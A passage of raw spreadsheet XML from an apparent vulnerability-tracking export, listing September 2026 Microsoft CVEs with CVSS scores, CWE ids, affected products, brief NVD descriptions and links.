r="B1102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1102" s="5" t="inlineStr"><is><t>CVE-2026-69374</t></is></c><c r="D1102" s="5" t="n"><v>6.5</v></c><c r="E1102" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1102" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1102" s="5" t="inlineStr" /><c r="H1102" s="5" t="n"><v>0.011</v></c><c r="I1102" s="5" t="inlineStr" /><c r="J1102" s="5" t="inlineStr" /><c r="K1102" s="5" t="inlineStr" /><c r="L1102" s="5" t="inlineStr" /><c r="M1102" s="5" t="inlineStr" /><c r="N1102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1102" s="5" t="inlineStr" /><c r="R1102" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1102" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t></is></c></row><row r="1103"><c r="A1103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1103" s="5" t="inlineStr"><is><t>CVE-2026-69375</t></is></c><c r="D1103" s="5" t="n"><v>6.5</v></c><c r="E1103" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1103" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1103" s="5" t="inlineStr" /><c r="H1103" s="5" t="n"><v>0.006</v></c><c r="I1103" s="5" t="inlineStr" /><c r="J1103" s="5" t="inlineStr" /><c r="K1103" s="5" t="inlineStr" /><c r="L1103" s="5" t="inlineStr" /><c r="M1103" s="5" t="inlineStr" /><c r="N1103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1103" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1103" s="5" t="inlineStr" /><c r="R1103" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1103" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t></is></c></row><row r="1104"><c r="A1104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1104" s="5" t="inlineStr"><is><t>CVE-2026-69395</t></is></c><c r="D1104" s="5" t="n"><v>6.5</v></c><c r="E1104" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1104" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1104" s="5" t="inlineStr" /><c r="H1104" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1104" s="5" t="inlineStr" /><c r="J1104" s="5" t="inlineStr" /><c r="K1104" s="5" t="inlineStr" /><c r="L1104" s="5" t="inlineStr" /><c r="M1104" s="5" t="inlineStr" /><c r="N1104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1104" s="5" t="inlineStr" /><c r="R1104" s="5" t="inlineStr"><is><t>CWE-134</t></is></c><c r="S1104" s="5" t="inlineStr"><is><t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t></is></c></row><row r="1105"><c r="A1105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1105" s="5" t="inlineStr"><is><t>CVE-2026-69409</t></is></c><c r="D1105" s="5" t="n"><v>6.5</v></c><c r="E1105" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1105" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1105" s="5" t="inlineStr" /><c r="H1105" s="5" t="n"><v>0.01</v></c><c r="I1105" s="5" t="inlineStr" /><c r="J1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1105" s="5" t="inlineStr" /><c r="M1105" s="5" t="inlineStr" /><c r="N1105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1105" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1105" s="5" t="inlineStr" /><c r="R1105" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S1105" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t></is></c></row><row r="1106"><c r="A1106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1106" s="5" t="inlineStr"><is><t>CVE-2026-69497</t></is></c><c r="D1106" s="5" t="n"><v>6.5</v></c><c r="E1106" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1106" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1106" s="5" t="inlineStr" /><c r="H1106" s="5" t="n"><v>0.011</v></c><c r="I1106" s="5" t="inlineStr" /><c r="J1106" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1106" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1106" s="5" t="inlineStr" /><c r="M1106" s="5" t="inlineStr" /><c r="N1106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1106" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1106" s="5" t="inlineStr" /><c r="R1106" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1106" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t></is></c></row><row r="1107"><c r="A1107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1107" s="5" t="inlineStr"><is><t>CVE-2026-69562</t></is></c><c r="D1107" s="5" t="n"><v>6.5</v></c><c r="E1107" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1107" s="5" t="inlineStr" /><c r="H1107" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1107" s="5" t="inlineStr" /><c r="J1107" s="5" t="inlineStr" /><c r="K1107" s="5" t="inlineStr" /><c r="L1107" s="5" t="inlineStr" /><c r="M1107" s="5" t="inlineStr" /><c r="N1107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1107" s="5" t="inlineStr" /><c r="R1107" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1107" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69562</t></is></c></row><row r="1108"><c r="A1108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1108" s="5" t="inlineStr"><is><t>CVE-2026-69624</t></is></c><c r="D1108" s="5" t="n"><v>6.5</v></c><c r="E1108" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1108" s="5" t="inlineStr" /><c r="H1108" s="5" t="n"><v>0.007</v></c><c r="I1108" s="5" t="inlineStr" /><c r="J1108" s="5" t="inlineStr" /><c r="K1108" s="5" t="inlineStr" /><c r="L1108" s="5" t="inlineStr" /><c r="M1108" s="5" t="inlineStr" /><c r="N1108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1108" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1108" s="5" t="inlineStr" /><c r="R1108" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S1108" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t></is></c></row><row r="1109"><c r="A1109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1109" s="5" t="inlineStr"><is><t>CVE-2026-69626</t></is></c><c r="D1109" s="5" t="n"><v>6.5</v></c><c r="E1109" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1109" s="5" t="inlineStr" /><c r="H1109" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1109" s="5" t="inlineStr" /><c r="J1109" s="5" t="inlineStr" /><c r="K1109" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1109" s="5" t="inlineStr" /><c r="M1109" s="5" t="inlineStr" /><c r="N1109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1109" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1109" s="5" t="inlineStr" /><c r="R1109" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1109" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t></is></c></row><row r="1110"><c r="A1110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1110" s="5" t="inlineStr"><is><t>CVE-2026-69636</t></is></c><c r="D1110" s="5" t="n"><v>6.5</v></c><c r="E1110" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1110" s="5" t="inlineStr" /><c r="H1110" s="5" t="n"><v>0.01</v></c><c r="I1110" s="5" t="inlineStr" /><c r="J1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1110" s="5" t="inlineStr" /><c r="M1110" s="5" t="inlineStr" /><c r="N1110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1110" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1110" s="5" t="inlineStr" /><c r="R1110" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1110" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t></is></c></row><row r="1111"><c r="A1111" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1111" s="5" t="inlineStr"><is><t>CVE-2026-69719</t></is></c><c r="D1111" s="5" t="n"><v>6.5</v></c><c r="E1111" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1111" s="5" t="inlineStr" /><c r="H1111" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1111" s="5" t="inlineStr" /><c r="J1111" s="5" t="inlineStr" /><c r="K1111" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1111" s="5" t="inlineStr" /><c r="M1111" s="5" t="inlineStr" /><c r="N1111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1111" s="5" t="inlineStr" /><c r="R1111" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1111" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t></is></c></row><row r="1112"><c r="A1112" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1112" s="5" t="inlineStr"><is><t>CVE-2026-69734</t></is></c><c r="D1112" s="5" t="n"><v>6.5</v></c><c r="E1112" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1112" s="5" t="inlineStr" /><c r="H1112" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1112" s="5" t="inlineStr" /><c r="J1112" s="5" t="inlineStr" /><c r="K1112" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1112" s="5" t="inlineStr" /><c r="M1112" s="5" t="inlineStr" /><c r="N1112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1112" s="5" t="inlineStr" /><c r="R1112" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1112" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t></is></c></row><row r="1113"><c r="A1113" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1113" s="5" t="inlineStr"><is><t>CVE-2026-69781</t></is></c><c r="D1113" s="5" t="n"><v>6.5</v></c><c r="E1113" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1113" s="5" t="inlineStr" /><c r="H1113" s="5" t="n"><v>0.005</v></c><c r="I1113" s="5" t="inlineStr" /><c r="J1113" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1113" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1113" s="5" t="inlineStr" /><c r="M1113" s="5" t="inlineStr" /><c r="N1113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1113" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1113" s="5" t="inlineStr" /><c r="R1113" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1113" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t></is></c><c r="T1113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t></is></c></row><row r="1114"><c r="A1114" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1114" s="5" t="inlineStr"><is><t>CVE-2026-69839</t></is></c><c r="D1114" s="5" t="n"><v>6.5</v></c><c r="E1114" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1114" s="5" t="inlineStr" /><c r="H1114" s="5" t="n"><v>0.011</v></c><c r="I1114" s="5" t="inlineStr" /><c r="J1114" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1114" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1114" s="5" t="inlineStr" /><c r="M1114" s="5" t="inlineStr" /><c r="N1114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1114" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1114" s="5" t="inlineStr" /><c r="R1114" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S1114" s="5" t="inlineStr"><is><t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t></is></c><c r="T1114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t></is></c></row><row r="1115"><c r="A1115" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1115" s="5" t="inlineStr"><is><t>CVE-2026-70019</t></is></c><c r="D1115" s="5" t="n"><v>6.5</v></c><c r="E1115" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1115" s="5" t="inlineStr" /><c r="H1115" s="5" t="n"><v>0.011</v></c><c r="I1115" s="5" t="inlineStr" /><c r="J1115" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1115" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1115" s="5" t="inlineStr" /><c r="M1115" s="5" t="inlineStr" /><c r="N1115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1115" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1115" s="5" t="inlineStr" /><c r="R1115" s="5" t="inlineStr"><is><t>CWE-65</t></is></c><c r="S1115" s="5" t="inlineStr"><is><t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t></is></c></row><row r="1116"><c r="A1116" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1116" s="5" t="inlineStr"><is><t>CVE-2026-72938</t></is></c><c r="D1116" s="5" t="n"><v>6.5</v></c><c r="E1116" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1116" s="5" t="inlineStr" /><c r="H1116" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1116" s="5" t="inlineStr" /><c r="J1116" s="5" t="inlineStr" /><c r="K1116" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1116" s="5" t="inlineStr" /><c r="M1116" s="5" t="inlineStr" /><c r="N1116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1116" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1116" s="5" t="inlineStr" /><c r="R1116" s="5" t="inlineStr"><is><t>CWE-822, CWE-843</t></is></c><c r="S1116" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t></is></c></row><row r="1117"><c r="A1117" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1117" s="5" t="inlineStr"><is><t>CVE-2026-72939</t></is></c><c r="D1117" s="5" t="n"><v>6.5</v></c><c r="E1117" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1117" s="5" t="inlineStr" /><c r="H1117" s="5" t="n"><v>0.011</v></c><c r="I1117" s="5" t="inlineStr" /><c r="J1117" s="5" t="inlineStr" /><c r="K1117" s="5" t="inlineStr" /><c r="L1117" s="5" t="inlineStr" /><c r="M1117" s="5" t="inlineStr" /><c r="N1117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1117" s="5" t="inlineStr" /><c r="R1117" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1117" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t></is></c></row><row r="1118"><c r="A1118" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1118" s="5" t="inlineStr"><is><t>CVE-2026-72942</t></is></c><c r="D1118" s="5" t="n"><v>6.5</v></c><c r="E1118" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1118" s="5" t="inlineStr" /><c r="H1118" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1118" s="5" t="inlineStr" /><c r="J1118" s="5" t="inlineStr" /><c r="K1118" s="5" t="inlineStr" /><c r="L1118" s="5" t="inlineStr" /><c r="M1118" s="5" t="inlineStr" /><c r="N1118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1118" s="5" t="inlineStr" /><c r="R1118" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1118" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t></is></c></row><row r="1119"><c r="A1119" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1119" s="5" t="inlineStr"><is><t>CVE-2026-72956</t></is></c><c r="D1119" s="5" t="n"><v>6.5</v></c><c r="E1119" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1119" s="5" t="inlineStr" /><c r="H1119" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1119" s="5" t="inlineStr" /><c r="J1119" s="5" t="inlineStr" /><c r="K1119" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1119" s="5" t="inlineStr" /><c r="M1119" s="5" t="inlineStr" /><c r="N1119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1119" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1119" s="5" t="inlineStr" /><c r="R1119" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1119" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t></is></c></row><row r="1120"><c r="A1120" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1120" s="5" t="inlineStr"><is><t>CVE-2026-72974</t></is></c><c r="D1120" s="5" t="n"><v>6.5</v></c><c r="E1120" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1120" s="5" t="inlineStr" /><c r="H1120" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1120" s="5" t="inlineStr" /><c r="J1120" s="5" t="inlineStr" /><c r="K1120" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1120" s="5" t="inlineStr" /><c r="M1120" s="5" t="inlineStr" /><c r="N1120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1120" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1120" s="5" t="inlineStr" /><c r="R1120" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1120" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t></is></c></row><row r="1121"><c r="A1121" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1121" s="5" t="inlineStr"><is><t>CVE-2026-72975</t></is></c><c r="D1121" s="5" t="n"><v>6.5</v></c><c r="E1121" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1121" s="5" t="inlineStr" /><c r="H1121" s="5" t="n"><v>0.007</v></c><c r="I1121" s="5" t="inlineStr" /><c r="J1121" s="5" t="inlineStr" /><c r="K1121" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1121" s="5" t="inlineStr" /><c r="M1121" s="5" t="inlineStr" /><c r="N1121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1121" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1121" s="5" t="inlineStr" /><c r="R1121" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1121" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t></is></c></row><row r="1122"><c r="A1122" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1122" s="5" t="inlineStr"><is><t>CVE-2026-72977</t></is></c><c r="D1122" s="5" t="n"><v>6.5</v></c><c r="E1122" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1122" s="5" t="inlineStr" /><c r="H1122" s="5" t="n"><v>0.01</v></c><c r="I1122" s="5" t="inlineStr" /><c r="J1122" s="5" t="inlineStr" /><c r="K1122" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1122" s="5" t="inlineStr" /><c r="M1122" s="5" t="inlineStr" /><c r="N1122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c 